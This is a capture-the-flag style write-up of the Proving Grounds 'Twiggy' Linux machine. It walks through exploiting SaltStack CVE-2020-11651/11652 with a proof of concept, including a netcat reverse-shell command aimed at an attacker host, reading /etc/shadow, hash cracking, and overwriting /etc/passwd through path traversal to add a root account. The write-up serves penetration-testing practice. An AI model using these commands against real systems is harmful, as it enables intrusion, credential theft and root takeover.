Twiggy
Source: Proving Grounds OS: Linux Community Rating: Intermediate
Enumeration & Reconnaissance
I started with autorecon as usual and found the following open ports:
SSH (22)
DNS (53)
HTTP (80)
4505 & 4506
HTTP (8000)
Service Analysis
I began with the HTTP servers. The first one on port 80 hosted an application named Mezzanine with an admin login panel, a promising target. I tried multiple credentials (
admin:admin
,admin:password
, etc.) but none worked. I checked online for the default password (admin:default
) but that didn’t work either. I also looked for CVEs, but nothing surfaced.


Next, I moved to HTTP (8000), which exposed what appeared to be API endpoints. I interacted with them but only received 404 responses showing "CherryPy 5.6.0". The only CVE I found there was related to XSS, which wasn’t useful at the moment.


Stuck, I went back to the remaining ports: 4505 and 4506. Nmap didn’t recognize these ports clearly, the scan output only displayed "ZeroMQ ZMTP 2.0".

Gaining Initial Access
Searching for vulnerabilities, I found CVE-2020-11652 & CVE-2020-11651 (Saltstack 3000.1 vulnerabilities) which provide RCE, the HTTP 8000 responses included a header hinting at Saltstack.

I downloaded the PoC and had to install several modules first for it to work:
python -m venv .venv
source .venv/bin/activate
pip install salt
pip install pyyaml
pip install looseversion
pip install packaging
pip install tornado
pip install msgpack
pip install distro
pip install jinja2
pip install zmq
I attempted to get RCE using the PoC with:
python exploit.py --master 192.168.197.62 --exec "nc 192.168.45.201 8000 -e /bin/sh"
That attempt to execute arbitrary commands didn’t work. I then tried to read files instead, and that worked:
python exploit.py --master 192.168.197.62 -r /etc/passwd
I managed to read both /etc/passwd and /etc/shadow. I attempted to crack the root password, but that didn’t yield results.
unshadow passwd shadow
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Noticing an upload feature in the exploit, I considered replacing the passwd file. I tested with a random file to a random directory and it failed, out of desperation I still tried to replace the /etc/passwd file itself.
I added a new user, pwned, by generating a password hash with:
openssl passwd pwned
Then I appended the following line to the passwd file to create a root-level account:
pwned:$1$D/X2r2oc$ECKG4TeHHXumj2tUrYxaA/:0:0:root:/root:/bin/bash

After appending it, I uploaded the modified passwd file back to the target.
python exploit.py --master 192.168.197.62 --upload-src passwd --upload-dest ../../../../../../etc/passwd
python exploit.py --master 192.168.197.62 -r /etc/passwd
Crossed fingers, I retrieved the file, and sure enough, the new user was appended. I then SSHed into the target and that worked. I was in as root!

Lessons Learned
When standard web authentication bypasses fail, exploring less obvious ports and services (like the ZeroMQ ports) can reveal alternative attack vectors.
Using error-based or file read vulnerabilities to dump critical system files (e.g., /etc/passwd and /etc/shadow) can be a viable path to gaining initial access.
If direct cracking of the root password fails, consider creative methods such as replacing the passwd file to add a new user.
Last updated